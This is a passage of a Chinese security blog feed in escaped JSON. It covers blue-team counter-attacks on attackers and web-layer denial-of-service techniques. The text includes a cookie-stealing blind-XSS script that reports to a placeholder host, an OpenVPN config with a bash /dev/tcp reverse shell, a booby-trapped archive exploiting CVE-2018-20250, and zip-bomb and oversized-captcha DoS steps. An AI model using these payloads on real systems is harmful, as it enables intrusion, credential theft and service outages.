                      \u5176\u4e2d\u5177\u4f53\u7ec6\u8282\u4e0d\u8fc7\u591a\u8d58\u8ff0\uff0c\u5957\u8def\u90fd\u4e00\u6837\uff0c\u5728\u591a\u6b21\u6f14\u4e60\u4e2d\u90fd\u6210\u529f\u7684\u53cd\u5236\u5230\u4e86\u653b\u51fb\u961f\u7684VPS\uff0c\u751a\u81f3\u5728\u6f14\u4e60\u4e2d\u6211\u4eec\u62ff\u4e0b\u4e86\u653b\u51fb\u961f\u7684\u7ec8\u7aefPC\u2026<\/p>\n\n
                      \u76f2\u6253\u653b\u51fb\u53cd\u5236<\/h4>\n\n
                      \u76f2\u6253\u653b\u51fb\u7b97\u662f\u5728\u6f14\u4e60\u4e2d\u6bd4\u8f83\u4e0d\u5e38\u89c1\u7684\u4e86\uff0c\u56e0\u4e3a\u5176\u6548\u7387\u4e0d\u9ad8\uff0c\u6ca1\u529e\u6cd5\u76f4\u63a5\u7684\u76f4\u63a7\u6743\u9650\uff0c\u4f46\u5728\u653b\u51fb\u65b9\u7a77\u9014\u672b\u8def\u7684\u65f6\u5019\u5f80\u5f80\u4e5f\u4f1a\u9009\u62e9\u4f7f\u7528\u76f2\u6253\u6f0f\u6d1e\u7684\u65b9\u5f0f\u6765\u83b7\u53d6\u6743\u9650\u8fdb\u800c\u6df1\u5165\uff0c\u6bd4\u8f83\u5e38\u89c1\u7684\u5c31\u5c5e\u4e8e\u76f2\u6253XSS\u4e86\u3002<\/p>\n\n
                      \"\"<\/p>\n\n
                      \u4e00\u822c\u76f2\u6253XSS\u90fd\u5177\u5907\u4e00\u4e2a\u6570\u636e\u56de\u4f20\u63a5\u53e3\uff08\u653b\u51fb\u8005\u9700\u8981\u63a5\u6536Cookie\u4e4b\u7c7b\u7684\u6570\u636e\uff09\uff0c\u63a5\u53e3\u5728JavaScript\u4ee3\u7801\u4e2d\u662f\u53ef\u4ee5\u5bfb\u627e\u5230\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u6570\u636e\u56de\u4f20\u63a5\u53e3\u505a2\u4ef6\u4e8b\u60c5\uff1a<\/p>\n\n
                        \n  
                      1. \u6253\u810f\u6570\u636e\u56de\u4f20\u7ed9XSS\u5e73\u53f0\uff08\u6363\u4e71\uff09<\/li>\n  
                      2. \u6253\u865a\u5047\u6570\u636e\u56de\u4f20\u7ed9XSS\u5e73\u53f0\uff08\u8bf1\u5bfc\uff09<\/li>\n<\/ol>\n\n
                        \u901a\u5e38\u9009\u62e9\u7b2c\u4e8c\u79cd\u65b9\u5f0f\u66f4\u6709\u610f\u4e49\uff0c\u5f53\u7136\u5b9e\u5728\u4e0d\u884c\u7684\u60c5\u51b5\u4e0b\u6211\u4eec\u8fd8\u662f\u53ef\u4ee5\u9009\u62e9\u6363\u4e71\u7684\u2026<\/p>\n\n
                        \u9996\u5148\uff0c\u6211\u4eec\u83b7\u53d6\u5230\u4e86XSS\u76f2\u6253\u7684\u4ee3\u7801\uff1a<\/p>\n\n
                        '\"><sCRiPt sRC=https:\/\/XXXX\/shX36><\/sCrIpT>\n<\/code><\/pre>\n\n
                        \u8ddf\u8fdbSRC\u5c5e\u6027\u5bf9\u5e94\u503c\uff08\u5730\u5740\uff09\uff0c\u83b7\u5f97\u5982\u4e0bJavaScript\u4ee3\u7801\uff1a<\/p>\n\n
                        (function(){(new Image()).src='https:\/\/XXXX\/xss.php?do=api&id=shX36&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='https:\/\/XXXX\/xss.php?do=keepsession&id=shX36&url='+escape(document.location)+'&cookie='+escape(document.cookie)};\n<\/code><\/pre>\n\n
                        \u901a\u8fc7\u8be5\u6bb5\u4ee3\u7801\u6211\u4eec\u53ef\u4ee5\u77e5\u9053\u6570\u636e\u90fd\u56de\u4f20\u5230\u4e86\u8fd9\u4e2a\u63a5\u53e3\u4e0a\uff1ahttps:\/\/XXXX\/xss.php?do=api&id=shX36&location=\u5730\u5740&toplocation=\u5730\u5740&cookie=Cookie\u4fe1\u606f&opener=<\/code><\/p>\n\n
                        \u6211\u4eec\u5236\u5b9a\u4e86\u4e00\u4e2a\u8ba1\u5212\uff1a\u53d1\u9001\u5047\u6570\u636e\u524d\u5f80\u653b\u51fb\u8005\u6240\u4f7f\u7528\u7684XSS\u4fe1\u606f\u63a5\u6536\u5e73\u53f0\uff0c\u8bf1\u5bfc\u653b\u51fb\u8005\u8fdb\u5165\u871c\u7f50\u3002<\/p>\n\n
                        \u8d44\u6e90\u51c6\u5907\uff1a\u516c\u7f51\u57df\u540d\u89e3\u6790\u871c\u7f50\u5730\u5740\uff08\u9700\u8981\u5ba2\u6237\u7f51\u7edc\u5b89\u5168\u90e8\u95e8\u5177\u5907\u4e00\u5b9a\u7684\u6743\u5229\uff09\uff0c\u871c\u7f50\uff08\u9700\u8981\u5177\u5907\u871c\u7f50\u4ea7\u54c1\uff09\u4f2a\u9020\u5047\u540e\u53f0\uff0c\u5e76\u90e8\u7f72\u865a\u5047\u51c6\u5165\u5ba2\u6237\u7aef\u4e0b\u8f7d\uff1b\uff08\u3010\u7ec6\u8282\u3011\u5f53\u653b\u51fb\u8005Cookie\u4f2a\u9020\u8fdb\u540e\u53f0\u65f6\u4f1a\u63d0\u793a\uff1a\u5f53\u524d\u767b\u5f55IP\u4e0d\u5728\u51c6\u5165\u540d\u5355\uff09<\/p>\n\n
                        \"\"<\/p>\n\n
                        \u4e07\u4e8b\u4ff1\u5907\u53ea\u6b20\u4e1c\u98ce\uff0c\u5bf9\u5e94\u53c2\u6570\u4f20\u5165\u865a\u5047\u8bf1\u5bfc\u6570\u636e\uff08Location\u5730\u5740\u4e3a\u67e5\u770b\u7559\u8a00\u4fe1\u606f\u7684\u5730\u5740\uff0cToplocation\u4e3a\u5f15\u7528\u8be5\u754c\u9762\u7684\u5730\u5740\uff0c\u5c06\u7528\u6237\u540d\u3001\u5bc6\u7801\u5199\u5165\u5230Cookie\u4e2d\u914d\u5408\u201c\u51c6\u5165\u5ba2\u6237\u7aef\u201d\u7684\u8bf1\u5bfc\u653b\u51fb\uff09\u53d1\u9001\u8fc7\u53bb\uff0c\u7b49\u5f85\u653b\u51fb\u961f\u4e0a\u94a9\u3002<\/p>\n\n
                        \"\"<\/p>\n\n
                        \u6280\u5de7\u7bc7<\/h3>\n\n
                        \u6280\u5de7\u7bc7\u4e0d\u8fc7\u591a\u8bb2\u89e3\uff0c\u61c2\u5f97\u81ea\u7136\u61c2\u3002<\/p>\n\n
                        \u865a\u5047\u5907\u4efd\u6587\u4ef6<\/h4>\n\n
                        \u914d\u5408\u871c\u7f50\u90e8\u7f72\u865a\u5047\u6f0f\u6d1e\uff0c\u4f8b\u5982\u5907\u4efd\u6587\u4ef6\uff08WWW.rar\uff09\u914d\u5408CVE-2018-20250\u6f0f\u6d1e\u3002<\/p>\n\n
                        \u53c2\u8003\uff1ahttps:\/\/github.com\/WyAtu\/CVE-2018-20250<\/p>\n\n
                        OpenVPN\u914d\u7f6e\u540e\u95e8<\/h4>\n\n
                        OpenVPN\u914d\u7f6e\u6587\u4ef6\uff08OVPN\u6587\u4ef6<\/strong>\uff0c\u662f\u63d0\u4f9b\u7ed9OpenVPN\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u914d\u7f6e\u6587\u4ef6\uff09\u662f\u53ef\u4ee5\u4fee\u6539\u5e76\u52a0\u5165\u547d\u4ee4\u7684\u3002<\/p>\n\n
                        OVPN\u6587\u4ef6\u6700\u7b80\u5355\u7684\u5f62\u5f0f\u5982\u4e0b\uff1a<\/p>\n\n
                        remote 192.168.31.137\nifconfig 10.200.0.2 10.200.0.1\ndev tun\n<\/code><\/pre>\n\n
                        \n  
                        \u4ee5\u4e0a\u6587\u4ef6\u8868\u793a\uff0c\u5ba2\u6237\u7aef\u4f1a\u4ee5\u5f00\u653e\u7684\uff0c\u4e0d\u7528\u8eab\u4efd\u9a8c\u8bc1\u6216\u52a0\u5bc6\u65b9\u5f0f\u53bb\u8fde\u63a5IP\u4e3a192.168.31.137\u7684\u8fdc\u7a0b\u670d\u52a1\uff0c\u5728\u6b64\u8fc7\u7a0b\u4e2d\uff0c\u4f1a\u5efa\u7acb\u4e00\u79cd\u540d\u4e3atun\u7684\u8def\u7531\u6a21\u5f0f\uff0c\u7528\u5b83\u6765\u5728\u7cfb\u7edf\u4e0d\u540c\u5ba2\u6237\u7aef\u95f4\u6267\u884c\u70b9\u5bf9\u70b9\u534f\u8bae\uff0c\u4f8b\u5982\uff0c\u8fd9\u91cc\u7684tun\u8def\u7531\u6a21\u5f0f\u4e0b\uff0ctun\u5ba2\u6237\u7aef\u4e3a10.200.0.2\uff0ctun\u670d\u52a1\u7aef\u4e3a10.200.0.1\uff0c\u4e5f\u5c31\u662f\u672c\u5730\u7684tun\u8bbe\u5907\u5730\u5740\u3002\u8fd9\u91cc\u7684\u4e09\u884cOVPN\u914d\u7f6e\u6587\u4ef6\u53ea\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u793a\u4f8b\uff0c\u771f\u6b63\u5e94\u7528\u73af\u5883\u4e2d\u7684OVPN\u6587\u4ef6\u968f\u4fbf\u90fd\u662f\u6570\u767e\u884c\uff0c\u5176\u4e2d\u5305\u542b\u4e86\u5f88\u591a\u590d\u6742\u7684\u529f\u80fd\u914d\u7f6e\u3002<\/p>\n<\/blockquote>\n\n
                        OpenVPN \u914d\u7f6e\u529f\u80fd\u7684 up \u547d\u4ee4\u53ef\u4ee5\u4f7f\u5f97\u6dfb\u52a0\u914d\u7f6e\u6587\u4ef6\u540e\u6267\u884c\u6211\u4eec\u6240\u60f3\u8ba9\u5176\u6267\u884c\u7684\u547d\u4ee4\uff0c\u5b98\u65b9\u6587\u6863\u4e2d\u6709\u8bf4\u660e\uff1ahttps:\/\/openvpn.net\/community-resources\/reference-manual-for-openvpn-2-0\/<\/p>\n\n
                        \n  
                        \u6210\u529f\u542f\u7528 TUN\/TAP \u6a21\u5f0f\u540e\u7684 cmd \u547d\u4ee4\u3002<\/p>\n\n  
                        \u8be5cmd\u547d\u4ee4\u4e2d\u5305\u542b\u4e86\u4e00\u4e2a\u811a\u672c\u7a0b\u5e8f\u6267\u884c\u8def\u5f84\u548c\u53ef\u9009\u7684\u591a\u4e2a\u6267\u884c\u53c2\u6570\u3002\u8fd9\u79cd\u6267\u884c\u8def\u5f84\u548c\u53c2\u6570\u53ef\u7531\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7\uff0c\u6216\u8005\u662f\u53cd\u659c\u6760\u6765\u5f3a\u8c03\uff0c\u4e2d\u95f4\u7528\u7a7a\u683c\u533a\u5206\u3002up\u547d\u4ee4\u53ef\u7528\u4e8e\u6307\u5b9a\u8def\u7531\uff0c\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53d1\u5f80VPN\u53e6\u4e00\u7aef\u4e13\u7528\u5b50\u7f51\u7684IP\u6d41\u91cf\u4f1a\u88ab\u8def\u7531\u5230\u96a7\u9053\u4e2d\u53bb\u3002<\/p>\n<\/blockquote>\n\n
                        \u672c\u8d28\u4e0a\uff0cup\u547d\u4ee4\u4f1a\u6267\u884c\u4efb\u4f55\u4f60\u6307\u5411\u7684\u811a\u672c\u7a0b\u5e8f\u3002\u5982\u679c\u53d7\u5bb3\u8005\u4f7f\u7528\u7684\u662f\u652f\u6301\/dev\/tcp<\/code>\u7684Bash\u547d\u4ee4\u7248\u672c\uff0c\u90a3\u4e48\u5728\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u521b\u5efa\u4e00\u4e2a\u53cd\u5f39\u63a7\u5236 shell \u8f7b\u800c\u6613\u4e3e\u3002\u5c31\u5982\u4ee5\u4e0bOVPN\u6587\u4ef6\u4e2d\u5c31\u53ef\u521b\u5efa\u4e00\u4e2a\u8fde\u63a5\u5230 192.168.31.138:9090 \u7684\u53cd\u5f39shell\u3002<\/p>\n\n
                        remote 192.168.31.137\nifconfig 10.200.0.2 10.200.0.1\ndev tun\nscript-security 2\nup \"\/bin\/bash -c '\/bin\/bash -i > \/dev\/tcp\/192.168.31.138\/9090 0<&1 2>&1&'\"\n<\/code><\/pre>\n\n
                        \"-w797\"<\/p>\n\n
                        \u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cup \u547d\u4ee4\u9700\u8981\u6210\u529f\u8fde\u63a5\u4e3b\u673a\u624d\u4f1a\u6267\u884c\uff0c\u4e5f\u5c31\u662f\u8bf4192.168.31.137\u9700\u8981\u771f\u5b9e\u5b58\u5728\u3002<\/p>\n\n
                        \u5175\u5668\u6f0f\u6d1e<\/h4>\n\n
                        \u53ef\u4ee5\u5c1d\u8bd5\u6316\u6398\u8681\u5251\u3001\u51b0\u874e\u3001\u83dc\u5200\u3001BurpSuite\u3001SQLmap\u3001AWVS\u76840day\u6f0f\u6d1e\uff08\u9700\u8981\u4e00\u5b9a\u7684\u6280\u672f\u6c34\u5e73\uff09\uff0c\u6216\u5229\u7528\u5386\u53f2\u6f0f\u6d1e\u90e8\u7f72\u76f8\u5173\u73af\u5883\u8fdb\u884c\u53cd\u6253\uff0c\u4f8b\u5982\u8681\u5251\uff1ahttps:\/\/gitee.com\/mirrors\/antSword\/blob\/master\/CHANGELOG.md<\/p>\n\n
                        \u5386\u53f2\u7248\u672c\u4e2d\u51fa\u73b0\u8bf8\u591aXSS\u6f0f\u6d1e->RCE\uff1a<\/p>\n\n
                        \"-w942\"<\/p>\n\n
                        \u6587\u672b<\/h2>\n\n
                        \u53ea\u8981\u601d\u7ef4\u6d3b\u8dc3\uff0c\u67af\u71e5\u65e0\u5473\u7684\u4e00\u4ef6\u4e8b\u60c5\u4e5f\u53ef\u4ee5\u53d8\u5f97\u751f\u52a8\u6709\u8da3\uff0c\u751f\u6d3b\u5982\u6b64\uff0c\u5de5\u4f5c\u4ea6\u5982\u6b64\u3002<\/p>\n\n
                        \u84dd\u961f\u53cd\u5236\uff0c\u9700\u8981\u5177\u5907\u8fd9\u51e0\u4e2a\u6761\u4ef6\u624d\u80fd\u6dcb\u6f13\u5c3d\u81f3\u7684\u6325\u6d12\u51fa\u6765\uff1a<\/p>\n\n
                          \n  
                        1. \u5ba2\u6237\u5b89\u5168\u76f8\u5173\u90e8\u95e8\u7684\u6743\u529b\u8981\u9ad8<\/li>\n  
                        2. \u4ee5\u81ea\u5bb6\u5382\u5546\u4e3a\u4e3b\u5bfc\u7684\u9632\u5b88\u9879\u76ee<\/li>\n  
                        3. \u6700\u597d\u5177\u5907\u73b0\u6210\u7684\u73b0\u4ee3\u871c\u7f50\u4ea7\u54c1<\/li>\n<\/ol>\n\n
                          \u672a\u6765\uff0c\u653b\u9632\u5bf9\u6297\u6f14\u4e60\u4e0d\u4ec5\u4ec5\u662f\u524d\u51e0\u5e74\u6240\u5c55\u793a\u7684\u90a3\u6837\uff1a\u84dd\u961f\u53ea\u8981\u77e5\u9053\u9632\u5b88\u624b\u6bb5\uff1b\u800c\u8d8b\u52bf\u5c06\u4f1a\u6162\u6162\u7684\u504f\u5411\u4e8e\u771f\u6b63\u7684\u653b\u9632\uff0c\u84dd\u961f\u4e0d\u4ec5\u8981\u4f1a\u57fa\u672c\u7684\u9632\u5b88\u624b\u6bb5\uff0c\u8fd8\u8981\u5177\u5907\u5f3a\u608d\u7684\u5bf9\u6297\u80fd\u529b\uff0c\u4e0e\u7ea2\u961f\u8fdb\u884c\u5bf9\u6297\uff0c\u8fd9\u5bf9\u84dd\u961f\u6210\u5458\u7684\u653b\u9632\u6280\u672f\u6c34\u5e73\u4e5f\u662f\u4e00\u79cd\u66f4\u9ad8\u7684\u8003\u9a8c\u3002<\/p>\n\n
                          \u6700\u540e\u7684\u6700\u540e\uff1aHACK THE WORLD - TO DO IT.<\/p>\n\n
                          Reference<\/h3>\n\n
                          \u5bf9\u67d0\u653b\u51fb\u961f\u7684Webshell\u8fdb\u884c\u5206\u6790 - https:\/\/gh0st.cn\/archives\/2019-08-21\/1<\/p>\n\n
                          \u4eceOpenVPN\u914d\u7f6e\u6587\u4ef6\u4e2d\u521b\u5efa\u53cd\u5f39Shell\u5b9e\u73b0\u7528\u6237\u7cfb\u7edf\u63a7\u5236  - https:\/\/www.freebuf.com\/articles\/terminal\/175862.html<\/p>\n","pubDate":"2020-09-03T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2020-09-03\/1","guid":"https:\/\/gh0st.cn\/archives\/2020-09-03\/1"},{"title":"Web\u5c42\u9762\u4e0a\u7684\u90a3\u4e9b\u62d2\u7edd\u670d\u52a1\u653b\u51fb(DoS)","description":"
                          Web\u5c42\u9762\u4e0a\u7684\u90a3\u4e9b\u62d2\u7edd\u670d\u52a1\u653b\u51fb(DoS)<\/h1>\n\n
                          \u58f0\u660e<\/h2>\n\n
                          \u7531\u4e8e\u4f20\u64ad\u3001\u5229\u7528\u6b64\u6587\u6240\u63d0\u4f9b\u7684\u4fe1\u606f\u800c\u9020\u6210\u7684\u4efb\u4f55\u76f4\u63a5\u6216\u8005\u95f4\u63a5\u7684\u540e\u679c\u53ca\u635f\u5931\uff0c\u5747\u7531\u4f7f\u7528\u8005\u672c\u4eba\u8d1f\u8d23\uff0cVulkey_Chen(\u6234\u57ce)\u4e0d\u4e3a\u6b64\u627f\u62c5\u4efb\u4f55\u8d23\u4efb\u3002<\/p>\n\n
                          Vulkey_Chen(\u6234\u57ce)\u62e5\u6709\u5bf9\u6b64\u6587\u7ae0\u7684\u4fee\u6539\u548c\u89e3\u91ca\u6743\u3002\u5982\u6b32\u8f6c\u8f7d\u6216\u4f20\u64ad\u6b64\u6587\u7ae0\uff0c\u5fc5\u987b\u4fdd\u8bc1\u6b64\u6587\u7ae0\u7684\u5b8c\u6574\u6027\uff0c\u5305\u62ec\u7248\u6743\u58f0\u660e\u7b49\u5168\u90e8\u5185\u5bb9\u3002<\/p>\n\n
                          \u672a\u7ecfVulkey_Chen(\u6234\u57ce)\u5141\u8bb8\uff0c\u4e0d\u5f97\u4efb\u610f\u4fee\u6539\u6216\u8005\u589e\u51cf\u6b64\u6587\u7ae0\u5185\u5bb9\uff0c\u4e0d\u5f97\u4ee5\u4efb\u4f55\u65b9\u5f0f\u5c06\u5176\u7528\u4e8e\u5546\u4e1a\u76ee\u7684\u3002<\/p>\n\n
                          \u672c\u6587\u6240\u9700\u4e00\u5b9a\u57fa\u7840\u77e5\u8bc6\u65b9\u80fd\u987a\u7545\u7684\u8fdb\u884c\u9605\u8bfb\u548c\u7406\u89e3\uff0c\u57fa\u7840\u77e5\u8bc6\u8bf7\u8bfb\u8005\u81ea\u884c\u641c\u7d22\u5b66\u4e60\u3002<\/p>\n\n
                          \u524d\u8a00<\/h2>\n\n
                          \u76f8\u4fe1\u5f88\u591a\u5e08\u5085\u90fd\u4e86\u89e3DDoS\u653b\u51fb\uff0c\u4e5f\u5c31\u662f\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1\uff0c\u4f46\u8fd9\u7c7b\u653b\u51fb\u5728\u5f88\u591a\u65f6\u5019\u62fc\u7684\u662f\u8d44\u6e90\uff0c\u4ece\u653b\u51fb\u8005\u7684\u89d2\u5ea6\u6765\u770b\u8fdb\u884c\u6b64\u7c7b\u653b\u51fb\u8fd8\u662f\u9700\u8981\u4e00\u5b9a\u201c\u6210\u672c\u201d\u7684\uff0c\u4ece\u53d7\u5bb3\u8005\u7684\u89d2\u5ea6\u6765\u770b\u9632\u5fa1\u6b64\u7c7b\u653b\u51fb\u7684\u201c\u6210\u672c\u201d\u66f4\u662f\u6602\u8d35\uff01<\/p>\n\n
                          \u62d2\u7edd\u670d\u52a1\u662f\u4e00\u4e2a\u8001\u751f\u5e38\u8c08\u7684\u8bdd\u9898\uff0c\u800c\u53d1\u751f\u5728Web\u5c42\u9762\u7684\u62d2\u7edd\u670d\u52a1\u98ce\u9669\u4e00\u76f4\u4e0d\u88ab\u91cd\u89c6\uff1b\u867d\u7136\u5176\u4e0d\u5982RCE\u3001SQLi\u4e4b\u7c7b\u7684\u6f0f\u6d1e\u66f4\u52a0\u76f4\u63a5\u7684\u5f71\u54cd\u6570\u636e\u548c\u670d\u52a1\uff0c\u4f46\u4ee4\u670d\u52a1\u5668\u5b95\u673a\u8fd9\u7c7b\u98ce\u9669\u8fd8\u662f\u4e0d\u5bb9\u5c0f\u89c6\u3002<\/p>\n\n
                          \u8bd5\u60f3\u5982\u679c\u653b\u51fb\u8005\u53bb\u5229\u7528\u4e0d\u8d39\u6210\u672c<\/strong>\u7684Web\u5c42\u62d2\u7edd\u670d\u52a1\u98ce\u9669\u9020\u6210\u670d\u52a1\u5668\u3001\u5e94\u7528\u3001\u6a21\u5757\u2026\u762b\u75ea\u5b95\u673a\uff0c\u5c82\u4e0d\u662f\u4ee4\u90a3\u4e9b\u65a5\u5de8\u8d44\u5efa\u8bbe\/\u8d2d\u4e70\u201cDDoS\u9632\u62a4\u201d\u4e00\u8138\u61f5\uff5e<\/p>\n\n
                          \u539f\u7406\u53ca\u6848\u4f8b<\/h2>\n\n
                          \u8d44\u6e90\u751f\u6210\u5927\u5c0f\u53ef\u63a7<\/h3>\n\n
                          \u73b0\u5728\u6709\u8bb8\u591a\u8d44\u6e90\u662f\u7531\u670d\u52a1\u5668\u751f\u6210\u7136\u540e\u8fd4\u56de\u7ed9\u5ba2\u6237\u7aef\u7684\uff0c\u800c\u6b64\u7c7b\u201c\u8d44\u6e90\u751f\u6210\u201d\u63a5\u53e3\u5982\u82e5\u6709\u53c2\u6570\u53ef\u4ee5\u88ab\u5ba2\u6237\u7aef\u63a7\u5236\uff08\u53ef\u63a7\uff09\uff0c\u5e76\u6ca1\u6709\u505a\u4efb\u4f55\u8d44\u6e90\u751f\u6210\u5927\u5c0f\u9650\u5236\uff0c\u8fd9\u6837\u5c31\u4f1a\u9020\u6210\u62d2\u7edd\u670d\u52a1\u98ce\u9669\u3002<\/p>\n\n
                          \u6b64\u7c7b\u573a\u666f\u591a\u4e3a\uff1a\u56fe\u7247\u9a8c\u8bc1\u7801\u3001\u4e8c\u7ef4\u7801<\/p>\n\n
                          \u5b9e\u9645\u573a\u666f<\/h4>\n\n
                          \u56fe\u7247\u9a8c\u8bc1\u7801\u5728\u767b\u5f55\u3001\u6ce8\u518c\u3001\u627e\u56de\u5bc6\u7801\u2026\u7b49\u529f\u80fd\u6bd4\u8f83\u5e38\u89c1\uff1a<\/p>\n\n
                          \"\"<\/p>\n\n
                          \u5173\u6ce8\u4e00\u4e0b\u63a5\u53e3\u5730\u5740\uff1ahttps:\/\/attack\/validcode?w=130&h=53<\/code><\/p>\n\n
                          \u53c2\u6570\u503c\uff1aw=130&h=53<\/code>\uff0c\u6211\u4eec\u53ef\u4ee5\u7406\u89e3\u4e3a\u751f\u6210\u7684\u9a8c\u8bc1\u7801\u5927\u5c0f\u957f\u4e3a130<\/strong>\uff0c\u5bbd\u4e3a53<\/strong><\/p>\n\n
                          \u53ef\u4ee5\u5c06w=130<\/code>\u4fee\u6539\u4e3aw=130000000000000000<\/code>\uff0c\u8ba9\u670d\u52a1\u5668\u751f\u6210\u8d85\u5927\u7684\u56fe\u7247\u9a8c\u8bc1\u7801\u4ece\u800c\u5360\u7528\u670d\u52a1\u5668\u8d44\u6e90\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002<\/p>\n\n
                          \"\"<\/p>\n\n
                          Zip\u70b8\u5f39<\/h3>\n\n
                          \u4e0d\u77e5\u9053\u5404\u4f4d\u6709\u6ca1\u6709\u542c\u8bf4\u8fc7Zip\u70b8\u5f39\uff0c\u4e00\u4e2a42KB\u7684\u538b\u7f29\u6587\u4ef6(Zip)\uff0c\u89e3\u538b\u5b8c\u5176\u5b9e\u662f\u4e2a4.5PB<\/code>\u7684\u201c\u70b8\u5f39\u201d\u3002<\/p>\n\n
                          \u5148\u4e0d\u8bf44.5PB<\/code>\u8fd9\u4e2a\u60ca\u4eba\u7684\u5927\u5c0f\uff0c\u5149\u89e3\u538b\u90fd\u4f1a\u5360\u7528\u6781\u5927\u7684\u5185\u5b58\u3002<\/p>\n\n
                          \u8be5\u6587\u4ef6\u7684\u4e0b\u8f7d\u5730\u5740\uff1ahttps:\/\/www.bamsoftware.com\/hacks\/zipbomb\/42.zip<\/p>\n\n
                          \"-w447\"<\/p>\n\n
                          \n  
                          \u89e3\u538b\u8fd9\u4e2a42.zip<\/code>\u4ee5\u540e\u4f1a\u51fa\u73b016<\/code>\u4e2a\u538b\u7f29\u5305\uff0c\u6bcf\u4e2a\u538b\u7f29\u5305\u53c8\u5305\u542b16<\/code>\u4e2a\uff0c\u5982\u6b64\u5faa\u73af5<\/code>\u6b21\uff0c\u6700\u540e\u5f97\u523016<\/code>\u76845<\/code>\u6b21\u65b9\u4e2a\u6587\u4ef6\uff0c\u4e5f\u5c31\u662f1048576<\/code>\u4e2a\u6587\u4ef6\uff0c\u8fd9\u4e00\u767e\u591a\u4e07\u4e2a\u6700\u7ec8\u6587\u4ef6\uff0c\u6bcf\u4e2a\u5927\u5c0f\u4e3a4.3GB<\/code>\u3002\n\u56e0\u6b64\u6574\u4e2a\u89e3\u538b\u8fc7\u7a0b\u7ed3\u675f\u4ee5\u540e\uff0c\u4f1a\u5f97\u5230 1048576 * 4.6 GB = 4508876.8 GB<\/code>\uff0c\u4e5f\u5c31\u662f 4508876.8 \u00f7 1024 \u00f7 1024 = 4.5 PB<\/code>\u3002<\/p>\n<\/blockquote>\n\n
                          \u901a\u8fc7\u4ee5\u4e0a\u8bf4\u660e\uff0c\u6211\u4eec\u53ef\u4ee5\u5bfb\u627e\u5b58\u5728\u89e3\u538b\u529f\u80fd\u7684Web\u573a\u666f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u4f46\u662f\u8fd9\u91cc\u6709\u4e00\u4e2a\u524d\u7f6e\u6761\u4ef6\u5c31\u662f\u9700\u8981\u89e3\u538b\u5e76\u53ef\u4ee5\u9012\u5f52\u89e3\u538b\u3002<\/p>\n\n
                          \u90a3\u6211\u4eec\u60f3\u8981\u5b8c\u6210\u8fd9\u4e00\u653b\u51fb\u5c31\u975e\u5e38\u7684\u56f0\u96be\u4e86\uff0c\u201c\u524d\u8f88\u201d\u4e5f\u63d0\u5230\u4e86\u975e\u9012\u5f52\u7684Zip\u70b8\u5f39\uff0c\u4e5f\u5c31\u662f\u6ca1\u6709\u5d4c\u5957Zip\u6587\u4ef6\u6587\u4ef6\u7684\uff0c\u5982\u4e0b\u8868\u683c\uff1a<\/p>\n\n\n  \n    \n      \n    \n      \n      \n      
                          \u540d\u79f0<\/th>\n      \u89e3\u538b\u7ed3\u679c<\/th>\n    <\/tr>\n  <\/thead>\n  
                          zbsm.zip<\/a><\/td>\n      42 kB \t\u2192 \t5.5 GB<\/td>\n    <\/tr>\n    
                          zblg.zip<\/a><\/td>\n      10 MB \t\u2192 \t281 TB<\/td>\n    <\/tr>\n    
                          zbxl.zip<\/a><\/td>\n      46 MB \t\u2192 \t4.5 PB (Zip64, less compatible)<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n\n
                          \u5b58\u5728\u89e3\u538b\u529f\u80fd\u7684Web\u573a\u666f\u8fd8\u662f\u6bd4\u8f83\u591a\u7684\uff0c\u53ef\u4ee5\u6839\u636e\u5b9e\u9645\u4e1a\u52a1\u573a\u666f\u8fdb\u884c\u5bfb\u627e\u3002<\/p>\n\n
                          \u5b9e\u9645\u573a\u666f<\/h4>\n\n
                          \u6839\u636e\u5b9e\u9645\u4e1a\u52a1\u573a\u666f\u53d1\u73b0\u4e00\u5904\u4e0a\u4f20\u6a21\u677f\u6587\u4ef6\u529f\u80fd\uff0c\u6839\u636e\u7b80\u5355\u7684\u6d4b\u8bd5\uff0c\u53d1\u73b0\u6b64\u5904\u4e0a\u4f20Zip\u6587\u4ef6\u4f1a\u81ea\u52a8\u89e3\u538b\uff1a<\/p>\n\n
                          \"-w176\"<\/p>\n\n
                          \"-w400\"<\/p>\n\n
                          \u8fd9\u91cc\u6211\u9009\u62e9\u4e0a\u4f20zbsm.zip<\/code>\u4e0a\u53bb\uff0c\u770b\u4e00\u4e0b\u670d\u52a1\u5668\u53cd\u5e94:<\/p>\n\n
                          \"-w171\"<\/p>\n\n
                          \u8fd9\u91cc\u6574\u4e2a\u670d\u52a1\u7684\u8bf7\u6c42\u90fd\u6ca1\u6709\u8fd4\u56de\u7ed3\u679c\uff0c\u6210\u529f\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002<\/p>\n\n
                          XDoS(XML\u62d2\u7edd\u670d\u52a1\u653b\u51fb)<\/h3>\n\n
                          XDoS\uff0cXML\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u5176\u5c31\u662f\u5229\u7528DTD\u4ea7\u751fXML\u70b8\u5f39\uff0c\u5f53\u670d\u52a1\u7aef\u53bb\u89e3\u6790XML\u6587\u6863\u65f6\uff0c\u4f1a\u8fc5\u901f\u5360\u7528\u5927\u91cf\u5185\u5b58\u53bb\u89e3\u6790\uff0c\u4e0b\u9762\u6211\u4eec\u6765\u770b\u51e0\u4e2aXML\u6587\u6863\u7684\u4f8b\u5b50\u3002<\/p>\n\n
                          Billion Laughs<\/h4>\n\n
